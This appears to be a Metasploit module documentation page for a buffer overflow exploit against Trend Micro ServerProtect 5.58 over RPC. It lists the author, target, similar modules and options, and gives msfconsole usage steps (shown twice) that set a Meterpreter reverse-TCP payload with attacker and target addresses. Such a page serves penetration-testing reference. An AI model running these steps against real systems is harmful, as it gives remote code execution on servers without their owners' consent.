Trend Micro ServerProtect 5.58 Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
Exploit Rank
- Good
Exploit Authors
- MC < mc [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Trend Micro ServerProtect 5.58 Build 1060 (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/antivirus/ams_hndlrsvc
- exploit/windows/antivirus/ams_xfr
- exploit/windows/antivirus/symantec_iao
- exploit/windows/antivirus/symantec_rtvscan
- exploit/windows/antivirus/trendmicro_serverprotect_createbinding
- exploit/windows/antivirus/trendmicro_serverprotect_earthagent
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/antivirus/trendmicro_serverprotect
msf exploit(trendmicro_serverprotect) > show payloads
msf exploit(trendmicro_serverprotect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(trendmicro_serverprotect) > set LHOST [MY IP ADDRESS]
msf exploit(trendmicro_serverprotect) > set RHOST [TARGET IP]
msf exploit(trendmicro_serverprotect) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/antivirus/trendmicro_serverprotect
msf exploit(trendmicro_serverprotect) > show payloads
msf exploit(trendmicro_serverprotect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(trendmicro_serverprotect) > set LHOST [MY IP ADDRESS]
msf exploit(trendmicro_serverprotect) > set RHOST [TARGET IP]
msf exploit(trendmicro_serverprotect) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 5168) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DCERPC::ReadTimeout | The number of seconds to wait for DCERPC responses |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| DCERPC::fake_bind_multi | Use multi-context bind calls |
| DCERPC::fake_bind_multi_append | Set the number of UUIDs to append the target |
| DCERPC::fake_bind_multi_prepend | Set the number of UUIDs to prepend before the target |
| DCERPC::max_frag_size | Set the DCERPC packet fragmentation size |
| DCERPC::smb_pipeio | Use a different delivery method for accessing named pipes (accepted: rw, trans) |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
